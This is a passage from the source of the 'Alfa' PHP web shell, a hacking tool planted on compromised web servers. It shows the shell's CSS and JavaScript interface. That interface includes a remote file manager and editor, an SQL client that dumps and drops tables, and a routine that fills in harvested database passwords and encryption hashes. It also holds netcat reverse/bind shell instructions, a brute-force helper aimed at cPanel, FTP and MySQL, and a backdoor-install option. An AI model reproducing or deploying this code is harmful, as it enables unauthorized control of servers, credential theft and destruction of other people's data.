    width: 20px;
    top: 4px;
    text-align: center;
    cursor: pointer;
    color: white;
    background: red;
    border-radius: 100px;
    font-family: monospace;
    z-index: 10;
    transition: opacity 600ms ease-out;
    font-size: 15px;
    height: 19px;
}
.file-holder > .history:hover {
	background-color: #646464;
}
.editor-explorer > .hheader {
	position: relative;
    color: rgb(20, 255, 7);
    border-bottom: 2px rgb(32, 106, 162) solid;
    text-align: center;
    font-family: sans-serif;
    margin-bottom: 10px;
	height: 55px;
}
.editor-search {
	position: absolute;
    bottom: 7px;
    left: 31px;
}
.hheader-text {
	position: absolute;
    left: 8px;
    top: 2px;
}
.history-clear {
	position: absolute;
    right: 8px;
    top: 2px;
    cursor: pointer;
}
.editor-body {
	position: relative;
	margin-left: 3px;
}
.editor-anim-close {
	'.showAnimation("editorClose").'
}
@keyframes editorClose {
	0% {
		transform: scale(1);
		opacity: 1;
	}
	100% {
		transform: scale(0);
		opacity: 0;
	}
}
.editor-anim-minimize {
	'.showAnimation("editorMinimize").'
}
@keyframes editorMinimize {
	0% {
		right:0px;
		opacity: 1;
	}
	100% {
		right: -2000px;
		opacity: 0;
	}
}
.editor-anim-show {
	'.showAnimation("editorShow").'
}
@keyframes editorShow {
	0% {
		right:-2000px;
		opacity: 0;
	}
	100% {
		right: 0px;
		opacity: 1;
	}
}
.minimized-show {
	'.showAnimation("minimizeShow").'
}
@keyframes minimizeShow {
	0% {
		right: -30px;
		opacity: 0;
	}
	100% {
		right: 0px;
		opacity: 1;
	}
}
.minimized-hide {
	'.showAnimation("minimizeHide").'
}
@keyframes minimizeHide {
	0% {
		right: 0px;
		opacity: 1;
	}
	100% {
		right: -30px;
		opacity: 0;
	}
}
.solevisible-text:hover {
	-webkit-text-shadow: 0px 0px 25px #00FF00;
	-moz-text-shadow: 0px 0px 25px #00FF00;
	-ms-text-shadow: 0px 0px 25px #00FF00;
	text-shadow: 0px 0px 25px #00FF00;
}
.update-holder {
    position: fixed;
    top: 0;
    background-color: rgba(0, 24, 29, 0.72);
    width: 100%;
    height: 100%;
}
.update-partner {
    width: 50%;
    position: relative;
    border-radius: 31px;
    height: 200px;
    background-color: rgba(3, 3, 41, 0.47);
    text-align: center;
    color: rgba(252, 253, 251, 0.88);
    margin-left: 25%;
    top: 23%;
    font-family: "Francois One", sans-serif;
}
.update-partner:hover {
-webkit-box-shadow: inset 0px 0px 99px 9px rgba(11,15,41,1);
-moz-box-shadow: inset 0px 0px 99px 9px rgba(11,15,41,1);
box-shadow: inset 0px 0px 99px 9px rgba(11,15,41,1);
}
.update-content {
	position: relative;
}
.update-content > a {
    text-decoration: none;
    position: absolute;
    color: rgba(103, 167, 47, 0.77);
    left: 24%;
    margin-top: 7%;
    font-size: 40px;
    font-family: "Francois One", sans-serif;
}
.update-close {
	position: absolute;
    right: 0;
    margin-right: 23px;
    top: 10px;
    font-size: 27px;
    background-color: #130f50;
    width: 5%;
    border-radius: 100px;
    cursor: pointer;
    border: 2px rgb(14, 38, 90) solid;
}
.update-close:hover {
	border: 2px #25ff00 solid;
    color: #FF0000;
}
.filestools {
    height: auto;
    width: auto;
    color: #67ABDF;
    font-size: 12px;
    font-family: Verdana,Geneva,sans-serif;
}
@-moz-document url-prefix() {
	#search-input {
		width: 173px;
	}
	.editor-path {
		top:3px;
	}
}
@keyframes spin {from {transform: rotate(0deg);}to{transform: rotate(360deg);}}
@-webkit-keyframes spin {from {-webkit-transform: rotate(0deg);}to {-webkit-transform: rotate(360deg);}}
@-moz-keyframes spin {from {-moz-transform: rotate(0deg);}to {-moz-transform: rotate(360deg);}}
@-ms-keyframes spin {from {-ms-transform: rotate(0deg);}to {-ms-transform: rotate(360deg);}}
#alfaloader{'.$csscode.'width:100px;height:100px;}
#a_loader{'.$csscode.'width:150px;height:150px;position:fixed;z-index:999999;top: 42%;left: 45%;display:none;}
.ajaxarea{border:1px solid #0E304A;color:#67ABDF}#up_bar{background-color:red;width:0;height:2px;display:none;position:fixed;z-index:100000}#hidden_sh{background-color:#0E304A;text-align:center;position:absolute;right:0;left:90%;border-bottom-left-radius:2em}.alert_green{color:#0F0;font-family:"Comic Sans MS";font-size:small;text-decoration:none}.whole{background-color:#000;background-image:url(http://solevisible.com/images/alfabg.png);background-position:center;background-attachment:fixed;background-repeat:no-repeat}.header{height:auto;width:auto;border:7px solid #0E304A;color:'.alfa_getColor("header_values").';font-size:12px;font-family:Verdana,Geneva,sans-serif}.header a{text-decoration:none;}.filestools a{color:#0F0;text-decoration:none}.filestools a:hover{color:#FFF;text-decoration:none;}span{font-weight:bolder;color:#FFF}.txtfont{font-family:"Comic Sans MS";font-size:small;color:#fff;display:inline-block}.txtfont_header{font-family:"Comic Sans MS";font-size:large;display:inline-block;color:#59cc33}.tbltxt{font-family:"Comic Sans MS";color:#fff;font-size:small;display:inline-block}input[type="file"]{display:none}.inputfile{border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;border-radius:4px;height:20px;width:250px;text-overflow:ellipsis;white-space:nowrap;cursor:pointer;display:inline-block;overflow:hidden}.inputfile:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}.inputfile span,.inputfile strong{padding:2px;padding-left:10px}.inputfile span{color:#25ff00;width:90px;min-height:2em;display:inline-block;text-overflow:ellipsis;white-space:nowrap;overflow:hidden;vertical-align:top;float:left}.inputfile strong{background-image:url('.__showicon('alfamini').');background-repeat:no-repeat;background-position:float;height:100%;width:109px;color:#fff;background-color:#0E304A;display:inline-block;float:right}.inputfile:focus strong,.inputfile.has-focus strong,.inputfile:hover strong{background-color:#46647A}.button{padding:3px}#addup,.button{cursor:pointer;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px;background-color:#000;color:green;border-radius:100px}#addup:hover,.button:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:disabled:hover{cursor:not-allowed}td{padding:'.($GLOBALS['DB_NAME']['show_icons']=='1'?'0':'1').'px}.myCheckbox{padding-left:2px}.myCheckbox label{display:inline-block;cursor:pointer;position:relative}.myCheckbox input[type=checkbox]{display:none}.myCheckbox label:before{content:"";display:inline-block;width:14px;height:13px;position:absolute;background-color:#aaa;box-shadow:inset 0 2px 3px 0 rgba(0,0,0,.3),0 1px 0 0 rgba(255,255,255,.8)}.myCheckbox label{margin-bottom:15px;padding-right:17px}.myCheckbox label:before{border-radius:100px}input[type=checkbox]:checked + label:before{content:"";background-color:#0E304A;background-image:url('.__showicon('alfamini').');background-repeat:no-repeat;background-position:50% 50%;background-size:14px 14px;border:1px solid #0F0;box-shadow:0 0 4px #0F0}#meunlist{font-family:Verdana,Geneva,sans-serif;color:#FFF;width:auto;border-right-width:7px;border-left-width:7px;height:auto;font-size:12px;font-weight:700;border-top-width:0;border-color:#0E304A;border-style:solid}.whole #meunlist ul{text-align:center;list-style-type:none;margin:0;padding:5px 5px 7px 2px}.whole #meunlist li{margin:0;padding:0;display:inline}.whole #meunlist a{font-family:arial,sans-serif;font-size:14px;text-decoration:none;font-weight:700;clear:both;width:100px;margin-right:-6px;border-right-width:1px;border-right-style:solid;border-right-color:#FFF;padding:3px 15px}.foot{font-family:Verdana,Geneva,sans-serif;margin:0;padding:0;width:100%;text-align:center;font-size:12px;color:#0E304A;border-right-width:7px;border-left-width:7px;border-bottom-width:7px;border-bottom-style:solid;border-right-style:solid;border-right-style:solid;border-left-style:solid;border-color:#0E304A}#text{text-align:center}input[type=submit]{cursor:pointer;background-image:url('.__showicon('btn').');background-repeat:no-repeat;background-position:50% 50%;background-size:23px 23px;background-color:#000;width:30px;height:30px;border:1px solid #27979B;border-radius:100px}textarea{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}textarea:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}input[type=submit]:hover{color:#000;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:2px solid #27979B;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}select{padding:3px;width:162px;color:#FFE;text-shadow:#000 0 2px 7px;border:1px solid #0E304A;background:#000;text-decoration:none;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}select:hover{border:1px solid #27979B;box-shadow:0 0 4px #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}
.foottable{width: 300px;font-weight: bold;'.(!@is_writable($GLOBALS['cwd'])?'}.dir{background-color:red;}':'}').'
.main th{text-align:left;}
.main a{color: #FFF;}
.main tr:hover{background-color:#646464;}
.ml1{ border:1px solid #0E304A;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:99%; height:300px; }
'.alfaCssLoadColors().'
</style>';
echo "<script type='text/javascript'>
var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
var alfa1_ = '" . ((strpos(@$_POST['alfa1'],"\n")!==false)?'':htmlspecialchars($_POST['alfa1'],ENT_QUOTES)) ."';
var alfa2_ = '" . ((strpos(@$_POST['alfa2'],"\n")!==false)?'':htmlspecialchars($_POST['alfa2'],ENT_QUOTES)) ."';
var alfa3_ = '" . ((strpos(@$_POST['alfa3'],"\n")!==false)?'':htmlspecialchars($_POST['alfa3'],ENT_QUOTES)) ."';
var alfa4_ = '" . ((strpos(@$_POST['alfa4'],"\n")!==false)?'':htmlspecialchars($_POST['alfa4'],ENT_QUOTES)) ."';
var alfa5_ = '" . ((strpos(@$_POST['alfa5'],"\n")!==false)?'':htmlspecialchars($_POST['alfa5'],ENT_QUOTES)) ."';
var alfa6_ = '" . ((strpos(@$_POST['alfa6'],"\n")!==false)?'':htmlspecialchars($_POST['alfa6'],ENT_QUOTES)) ."';
var alfa7_ = '" . ((strpos(@$_POST['alfa7'],"\n")!==false)?'':htmlspecialchars($_POST['alfa7'],ENT_QUOTES)) ."';
var alfa8_ = '" . ((strpos(@$_POST['alfa8'],"\n")!==false)?'':htmlspecialchars($_POST['alfa8'],ENT_QUOTES)) ."';
var alfa9_ = '" . ((strpos(@$_POST['alfa9'],"\n")!==false)?'':htmlspecialchars($_POST['alfa9'],ENT_QUOTES)) ."';
var alfa10_ = '" . ((strpos(@$_POST['alfa10'],"\n")!==false)?'':htmlspecialchars($_POST['alfa10'],ENT_QUOTES)) ."';
var d = document;
var mysql_cache = {};
var editor_files = {};
var editor_error = true;
var editor_current_file = '';
var is_minimized = false;
var cgi_is_minimized = false;
var cgi_lang = '';
var upcount = 1;
var islinux = ".($GLOBALS['sys']!="win"?'true':'false').";
var post_encryption_mode = ".(__ALFA_POST_ENCRYPTION__?'true':'false').";
function set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset) {
if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;";
for($j=1;$j<=10;$j++){
echo 'if(alfa'.$j.'!=null)d.mf.alfa'.$j.'.value=alfa'.$j.';else d.mf.alfa'.$j.'.value=alfa'.$j.'_;';
}
echo "
if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
}";
echo 'function fc(a){alfaloader("block");var b="a="+alfab64("FilesMan")+"&c="+alfab64(a.c.value)+"&alfa1="+alfab64(a.alfa1.value)+"&ajax="+alfab64("true")+"&",c="";for(i=0;i<d.files.elements.length;i++)"checkbox"==d.files.elements[i].type&&d.files.elements[i].checked&&(c+="f[]="+alfab64(d.files.elements[i].value)+"&");_Ajax(d.URL,b+c,function(a){alfaloader("none")},!0)}function initDir(a){var b="",c="";islinux&&(b="<a class=\"header_pwd\" onclick=\"g(\'FilesMan\',\'/\');\" href=\'javascript:void(0);\'>/</a>",c="/");var e=a.split("/"),f="",g="";"-1"!=e.indexOf("..")&&(e.splice(e.indexOf("..")-1,1),e.splice(e.indexOf(".."),1));for(i in e)""!=e[i]&&(f+="<a onclick=\"g(\'FilesMan\',\'"+g+e[i]+"/\');\" href=\'javascript:void(0);\' class=\"header_pwd\">"+e[i]+"/</a>",g+=e[i]+"/");$("header_cwd").innerHTML=b+f+" ";var e=c+e.join("/");e=e.replace("//","/"),d.footer_form.c.value=e,$("footer_cwd").value=e,c_=e}function evalJS(html){var newElement=document.createElement("div");newElement.innerHTML=html;for(var scripts=newElement.getElementsByTagName("script"),i=0;i<scripts.length;++i){var script=scripts[i];eval(script.innerHTML)}}function _Ajax(a,b,c,e){var f=!1;return window.XMLHttpRequest?f=new XMLHttpRequest:window.ActiveXObject&&(f=new ActiveXObject("Microsoft.XMLHTTP")),f?(f.onreadystatechange=function(){4==f.readyState&&200==f.status&&("function"!=typeof c?d.getElementsByClassName("ajaxarea")[0].innerHTML=f.responseText:e?(d.getElementsByClassName("ajaxarea")[0].innerHTML=f.responseText,c(f.responseText)):c(f.responseText))},f.open("POST",a,!0),f.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),f.send(b),void 0):void alert("Error !")}function handleup(a,b){var c="__fnameup";0!=b&&(c="__fnameup"+b),a.files[0].name&&($(c).innerHTML=a.files[0].name)}function u(a){alfaloader("block");a.submit.disabled=true;var av = a.a.value,cv = a.c.value,alv = a.alfa1.value,cha = a.charset.value;var b=!1;if(a.a.value=alfab64(a.a.value),a.c.value=alfab64(a.c.value),a.alfa1.value=alfab64(a.alfa1.value),a.charset.value=alfab64(a.charset.value),window.XMLHttpRequest?b=new XMLHttpRequest:window.ActiveXObject&&(b=new ActiveXObject("Microsoft.XMLHTTP")),b){var c=$("up_bar");b.upload&&(c.style.display="block",b.upload.onprogress=function(a){var b=a.position||a.loaded,d=a.totalSize||a.total,e=Math.floor(b/d*1e3)/10+"%";c.style.width=e}),b.onload=function(e){for(200===b.status?(_Ajax(d.URL,"a="+alfab64("FilesMan")+"&c="+a.c.value+"&ajax="+alfab64("true")),c.style.display="none",a.a.value=av,a.c.value=cv,a.alfa1.value=alv,a.charset.value=cha):alert("An error occurred!"),$("footerup").value="",$("__fnameup").innerHTML="";upcount;){var f=$("pfooterup_"+upcount);f&&f.parentNode.removeChild(f),upcount--}0==upcount&&upcount++,alfaloader("none"),a.submit.disabled=false},b.onerror=function(a){};var e=new FormData(a);b.open("POST",d.URL),b.send(e)}}function g(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset){set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset),"GetConfig"!=a&&"download"!=alfa2&&(d.getElementsByClassName("ajaxarea")[0].innerHTML=\'<center><br /><img id="alfaloader" src="'.__showicon('loader').'"></img><br /><br /></center>\'),islinux&&"/"!=d.mf.c.value.substr(0,1)&&(d.mf.c.value="/"+d.mf.c.value);for(var data="a="+alfab64(a)+"&c="+alfab64(d.mf.c.value)+"&",i=1;i<=10;i++)data+="alfa"+i+"="+alfab64(eval("d.mf.alfa"+i+".value"))+"&";if(data+="&ajax="+alfab64("true"),"FilesTools"==a&&"download"==alfa2){var dl=$("dlForm");return dl.a.value=alfab64("dlfile"),dl.c.value=alfab64(d.mf.c.value),dl.file.value=alfab64(alfa1),void dl.submit()}"GetConfig"!=a?(_Ajax(d.URL,data),c!=c_&&c&&initDir(c)):(alfaloader("block"),_Ajax(d.URL,data,function(a){try{a=JSON.parse(a),a.host&&a.user&&a.dbname&&($("db_host")&&($("db_host").value=a.host),$("db_user")&&($("db_user").value=a.user),$("db_name")&&($("db_name").value=a.dbname),$("db_pw")&&($("db_pw").value=a.password),$("db_prefix")&&a.prefix&&($("db_prefix").value=a.prefix),$("cc_encryption_hash")&&a.cc_encryption_hash&&($("cc_encryption_hash").value=a.cc_encryption_hash))}catch(a){}alfaloader("none")}))}function alfaloader(a){$("a_loader").style.display=a}function fsu(a){alfaloader("block");for(var b={},c=0;c<a.elements.length;c++)"submit"!=a.elements[c].type&&(b[a.elements[c].name]=a.elements[c].value);for(c in mysql_cache)mysql_cache[c]=alfab64(mysql_cache[c]);_Ajax(d.URL,"a="+alfab64("Sql")+"&alfa1="+alfab64("update")+"&alfa2="+alfab64(JSON.stringify(b))+"&c="+alfab64(c_)+"&charset="+mysql_cache.charset+"&type="+mysql_cache.type+"&sql_host="+mysql_cache.host+"&sql_login="+mysql_cache.user+"&sql_pass="+mysql_cache.pass+"&sql_base="+mysql_cache.db+"&sql_count="+mysql_cache.count+"&ajax="+alfab64("true"),function(a){evalJS(a),alfaloader("none")},!0)}function fs(f,e){alfaloader("block");var alfa1="query",alfa2=f.query?alfab64(f.query.value):"",host=f.sql_host?f.sql_host.value:mysql_cache.host,user=f.sql_login?f.sql_login.value:mysql_cache.user,pass=f.sql_pass?f.sql_pass.value:mysql_cache.pass,db=f.sql_base?f.sql_base.value:mysql_cache.db,type=f.type?f.type.value:mysql_cache.type,charset=f.charset?f.charset.value:mysql_cache.charset,count="";switch(count=f.sql_count?f.sql_count.checked?"true":"":mysql_cache.count,f){case"0":alfa1="select",alfa2=alfab64(e);break;case"1":e=eval(e),alfa1="select",alfa2=alfab64(e[0])+"&alfa3="+alfab64(e[1]);break;case"2":e=eval(e),alfa1="edit",alfa2=alfab64(db)+"&alfa3="+alfab64(e.join(":"));break;case"3":alfa1="loadfile",alfa2=alfab64(e);break;case"4":case"5":alfa1=(f=="4"?"dumpfile":"droptbl");var obj={},id=$("dumpfile");for(obj.file=id?id.value:"dump.sql",obj.tbl=[],i=0;i<d.sf.elements["tbl[]"].length;++i)d.sf.elements["tbl[]"][i].checked&&obj.tbl.push(d.sf.elements["tbl[]"][i].value);alfa2=alfab64(JSON.stringify(obj))}_Ajax(d.URL,"a="+alfab64("Sql")+"&alfa1="+alfab64(alfa1)+"&alfa2="+alfa2+"&c="+alfab64(c_)+"&charset="+alfab64(charset)+"&type="+alfab64(type)+"&sql_host="+alfab64(host)+"&sql_login="+alfab64(user)+"&sql_pass="+alfab64(pass)+"&sql_base="+alfab64(db)+"&sql_count="+alfab64(count)+"&ajax="+alfab64("true"),function(a){evalJS(a),alfaloader("none")},!0)}function ctlbc(a){var b=$("bcStatus"),c=$("bcipAction");"bind"==a.value?(c.style.display="none",b.innerHTML="<small>Press ` <font color=\'red\'>>></font> ` button and run ` <font color=\'red\'>nc server_ip port</font> ` on your computer</small>"):(c.style.display="inline-block",b.innerHTML="<small>Run ` <font color=\'red\'>nc -l -v -p port</font> ` on your computer and press ` <font color=\'red\'>>></font> ` button</small>")}function is(){for(i=0;i<d.sf.elements["tbl[]"].length;++i)d.sf.elements["tbl[]"][i].checked=!d.sf.elements["tbl[]"][i].checked}function $(a){return d.getElementById(a)}function addnewup(){var a="footerup_"+upcount,b="pfooterup_"+upcount,c=1!=upcount?"pfooterup_"+(upcount-1):"pfooterup",e=d.createElement("p");e.innerHTML=\'<label class="inputfile" for="\'+a+\'"><span id="__fnameup\'+upcount+\'"></span> <strong>&nbsp;&nbsp;Choose a file</strong></label><input id="\'+a+\'" type="file" name="f[]" onChange="handleup(this,\'+upcount+\');">\',e.id=b,e.appendAfter($(c)),upcount++}function alfa_searcher_tool(a){switch(a){case"all":case"dirs":_alfaSet(!0,"Disabled");break;case"files":_alfaSet(!1,"php")}}function _alfaSet(a,b){d.srch.ext.disabled=a,d.srch.ext.value=b}function dis_input(a){switch(a){case"phpmyadmin":bruteSet(!0,"Disabled","http://");break;case"direct":bruteSet(!1,"2222","http://");break;case"cp":bruteSet(!1,"2082","http://");break;case"ftp":bruteSet(!0,"Disabled","ftp://");break;case"mysql":bruteSet(!1,"3306","http://");break;case"ftpc":bruteSet(!1,"21","http://")}}function bruteSet(a,b,d){"21"!=b?c="localhost":c="ftp.example.com",$("port").disabled=a,$("port").value=b,$("target").value=c,$("protocol").value=d}Element.prototype.appendAfter=function(a){a.parentNode.insertBefore(this,a.nextSibling)};function inBackdoor(t){if(t.value=="my"){$("backdoor_textarea").style.display="block";}else{$("backdoor_textarea").style.display="none";}}
function saveByKey(event){
	if(!(String.fromCharCode(event.which).toLowerCase() == \'s\' && event.ctrlKey) && !(event.which == 19))return true;
	$("editor_edit_area").onsubmit();
	event.preventDefault();
	return false;
}
function setCookie(cname, cvalue, exdays){
    var d = new Date();
    d.setTime(d.getTime() + (exdays*24*60*60*1000));
    var expires = "expires="+ d.toUTCString();
    document.cookie = cname + "=" + cvalue + ";" + expires + ";path=/";
}
function getCookie(name){
  var value = "; " + document.cookie;
  var parts = value.split("; " + name + "=");
  if (parts.length == 2) return parts.pop().split(";").shift();
}
function editorClose(pos){
	d.body.style.overflow = "visible";
	elem = $(pos);
	elem.setAttribute("class", "editor-anim-close");
	if(pos == "editor"){
		is_minimized = false;
	}else{
		cgi_is_minimized = false;
	}
	setTimeout(function(){
		elem.removeAttribute("class");
		elem.style.display = "none";
	}, 1000);
	d.body.style.overflow = "visible";
}
function showEditor(pos){
	$(pos).setAttribute("class", "editor-anim-show");
	$(pos+"-minimized").setAttribute("class", "minimized-hide");
	if(pos == "editor"){
		is_minimized = false;
		if(cgi_is_minimized){
			$("cgiloader-minimized").style.top = "30%";
		}
	}else{
		cgi_is_minimized = false;
		if(is_minimized){
			$("editor-minimized").style.top = "30%";
		}
	}
	d.body.style.overflow = "hidden";
}
function editorMinimize(pos){
	$(pos).setAttribute("class", "editor-anim-minimize");
	$(pos+"-minimized").setAttribute("class", "minimized-show");
	if(pos == "editor"){
		is_minimized = true;
		if(cgi_is_minimized){
			$("cgiloader-minimized").style.top = "20%";
			$("editor-minimized").style.top = "50%";
		}else{
			$("editor-minimized").style.top = "30%";
		}
	}else{
		cgi_is_minimized = true;
		if(is_minimized){
			$("cgiloader-minimized").style.top = "20%";
			$("editor-minimized").style.top = "50%";
		}else{
			$("cgiloader-minimized").style.top = "30%";
		}
	}
	d.body.style.overflow = "visible";
}
function clearEditorHistory(){
	var check = confirm("Are u Sure?");
	if(check){
		for(var i in editor_files){
			if(i != editor_current_file){
				removeHistory(i);
			}
		}
	}
}
function editor(file, mode, arg, pwd, file_id, type){
	if(type=="dir"&&file=="..")return false;
	if(mode == "download"){
		g("FilesTools",pwd,file,"download");
		return false;
	}
	var param = "", fid = "", pure_fid = "", cwd = d.mf.c.value, can_append = true;
	file = file.trim();
	if(Object.keys(editor_files).length == 0){
		var cookie_file = getCookie("alfa_history_files");
		try{
			editor_files = JSON.parse(cookie_file);
			for(var t in editor_files){
				insertToHistory(t, editor_files[t].file, 0, editor_files[t].type);
			}
		}catch(e){}
	}
	if(file.indexOf("/") != -1){
		var file_split = file.split("/");
		file = file_split[file_split.length - 1];
		delete file_split[file_split.length - 1];
		cwd = file_split.join("/");
		if(islinux){
			cwd = "/"+cwd;
		}
	}
	if(typeof type == "undefined"){
		type = "";
	}
	if(typeof pwd != "undefined" && pwd != null && pwd.length != 0){
		cwd = pwd.trim();
	}
	try{
		for(var i in editor_files){
			if(editor_files[i].file == decodeURIComponent(file) && editor_files[i].pwd.replace(/\//g,"") == cwd.replace(/\//g,"")){
				can_append = false;
				file_id = i;
				break;
			}
		}
	}catch(e){
		console.log(e);
	}
	editor_error = true;
	if(typeof arg != "undefined" && arg.length != 0 && arg != null){
		param = alfab64(arg);
	}
	if(typeof file_id != "undefined" && file_id != null && file_id.length != 0){
		fid = alfab64(file_id);
		pure_fid = file_id;
	}else{
		var rand_fid = "file_" + getRandom(10);
		fid = alfab64(rand_fid);
		pure_fid = rand_fid;
	}
	alfaloader("block");
	_Ajax(d.URL, "a="+alfab64("FilesTools")+"&c="+alfab64(cwd)+"&alfa1="+alfab64(file)+"&alfa2="+alfab64(mode)+"&alfa3="+param+"&alfa4="+fid+"&alfa5=&alfa6=&alfa7=&alfa8=&alfa9=&alfa10=&&ajax="+alfab64("true"), function(e){
		document.querySelector(".editor-content").innerHTML = e;
		$("editor").style.display  = "block";
		alfaloader("none");
		evalJS(e);
		if(mode != "delete" && editor_error){
			var active = d.getElementsByClassName("is_active");
			if(active.length != 0){
				active[0].className = "file-holder";
			}
			fid = pure_fid;
			file = decodeURIComponent(file);

			if(!editor_files[fid] && can_append){
				editor_files[fid] = {"file": file, "pwd": cwd, "type": type};
				insertToHistory(fid, file, " is_active", type);
				if(mode=="mkfile"){
					g("FilesMan",null);
				}
			}else{
				$(fid).parentNode.className += " is_active";
			}
		}
		d.body.style.overflow = "hidden";
		d.getElementsByClassName("filestools")[0].setAttribute("fid", fid);
		if(editor_files[fid]){
			d.getElementsByClassName("editor-path")[0].innerHTML = (editor_files[fid].pwd + "/" + editor_files[fid].file).replace(/\/\//g, "/");
		}
		editor_current_file = fid;
		if(is_minimized){
			showEditor("editor");
		}
		updateCookieEditor();
	});
	return false;
}
function insertToHistory(fid, file, mode, type){
	var active = "";
	if(mode && mode != 0){
		active = mode;
	}
	var NewElement = document.createElement("div");
	NewElement.innerHTML = "<div id=\'"+fid+"\' class=\'history\' onClick=\'reopen(this);\'><div class=\'editor-icon\'>"+loadType(file,type,fid)+"</div><div class=\'editor-file-name\'>"+file+"</div></div><div class=\'history-close\' onClick=\'removeHistory(\""+fid+"\");\'>X</div>";
	NewElement.className = "file-holder" + active;
	NewElement.addEventListener("mouseover", function(){setEditorTitle(fid,"over");this.childNodes[1].style.opacity = "1";});
	NewElement.addEventListener("mouseout", function(){setEditorTitle(fid,"out");this.childNodes[1].style.opacity = "0";});
	var refNode = d.getElementsByClassName("history-list")[0];
	refNode.insertBefore(NewElement, refNode.firstChild);
}
function loadType(file,type,id){
	if(type == "none"){
		_Ajax(d.URL, "a="+alfab64("checkfiletype")+"&path="+alfab64(editor_files[id].pwd)+"&arg="+alfab64(editor_files[id].file), function(e){
			$(id).innerHTML = "<div class=\'editor-icon\'>"+loadType(editor_files[id].file,e,id)+"</div><div class=\'editor-file-name\'>"+editor_files[id].file+"</div>";
			editor_files[id].type = e;
		});
	}
	var img = \'<img src="http://solevisible.com/icons/{type}" width="30" height="30">\';
	if(type == "file"){
		type = file.split(".");
		type  = type[type.length - 1].toLowerCase();
		var types = ["json","ppt","pptx","xls","xlsx","msi","config","cgi","pm","c","cpp","cs","java","aspx","asp","db","ttf","eot","woff","woff2","woff","conf","log","apk","cab","bz2","tgz","dmg","izo","jar","7z","iso","rar","bat","sh","alfa","gz","tar","php","php4","php5","phtml","html","xhtml","shtml","htm","zip","png","jpg","jpeg","gif","bmp","ico","txt","js","rb","py","xml","css","sql","htaccess","pl","ini","dll","exe","mp3","mp4","m4a","mov","flv","swf","mkv","avi","wmv","mpg","mpeg","dat","pdf","3gp","doc","docx","docm"];
		if(types.indexOf(type) == -1){
			type = "notfound";
		}
	}else{
		type = "folder";
	}
	return img.replace("{type}",  type + ".png");
}
function updateDirsEditor(fid, fname){
	var current_path = d.mf.c.value + "/";
	var oldpath  = editor_files[fid].pwd + "/" + fname + "/";
	var newpath  = editor_files[fid].pwd + "/" + editor_files[fid].file + "/";
	oldpath = oldpath.replace(/\/\//g, "/");
	newpath = newpath.replace(/\/\//g, "/");
	current_path = current_path.replace(/\/\//g, "/");
	if(current_path.search(oldpath) != -1){
		initDir(current_path.replace(oldpath, newpath));
		d.mf.c.value = current_path.replace(oldpath, newpath);
		_Ajax(d.URL,"a="+alfab64("updatepath")+"&path="+alfab64(d.mf.c.value),function(e){console.log(e)});
	}
	for(var i in editor_files){
		var path = editor_files[i].pwd + "/";
		path = path.replace(/\/\//g, "/");
		if(path.search(oldpath) != -1){
			editor_files[i].pwd = path.replace(oldpath, newpath);
		}
	}
	var reg1 = new RegExp("\'"+oldpath.slice(0, -1)+"\'");
	var reg2 = new RegExp(fname + " \\\|</b></a>");
	d.files.innerHTML = d.files.innerHTML.replace(reg1, "\'"+newpath.slice(0, -1)+"\'");
	d.files.innerHTML = d.files.innerHTML.replace(reg2, editor_files[fid].file+" |</b></a>");
	updateCookieEditor();
}
function updateCookieEditor(){
